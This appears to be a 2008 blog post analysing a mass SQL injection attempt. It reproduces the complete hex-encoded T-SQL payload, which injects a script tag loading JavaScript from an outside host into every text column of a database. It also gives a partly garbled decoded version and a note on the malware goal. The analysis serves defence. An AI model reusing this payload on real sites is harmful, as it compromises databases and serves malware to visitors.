Wednesday, August 06, 2008

The following is a basic dissection of a failed SQL injection attempt

it starts with the following being passed in the URL against another URL Parameter (this has had line breaks added to prevent the formatting from being screwed up)

'DECLARE @S CHAR(4000)SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F627564756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F627564756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000))EXEC(@S)

this is the string hexadecimal decoded so that humans can read is as SQL speaks hexadecimal natively

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select' from sysobjects a'syscolumns b where and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src=""<>/script<>!--'' where '+@C+' not like ''%"></title><script src=""></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The following are the translated xtypes so we can see what type of fields it is trying to insert into

|XTYPE | Field Type|


|99 | ntext |

|35 | text |

|231 | nvarchar |

|167 | varchar |


it then proceeds to iterate through all the tables and rows in each, appending the string
</title><script src=""></script><!-- 

except where it has already found it, so the potential is there for multiple attacks but from the script having the opening HTML tags, only the initial successful attack would actually work.

This attack in particular redirects users to a malicious page that will attempt to get them to download a trojan type virus which is most likely a remote exploit that would allow remote control of their machine to be used in a botnet for any number of purchases, or simply a sniffer for "useful" information like credit cards and banking details.
This is probably not as bad from an administrative standpoint as a DROP * query being injected, but it is in my opinion a bit more sinister.

No comments: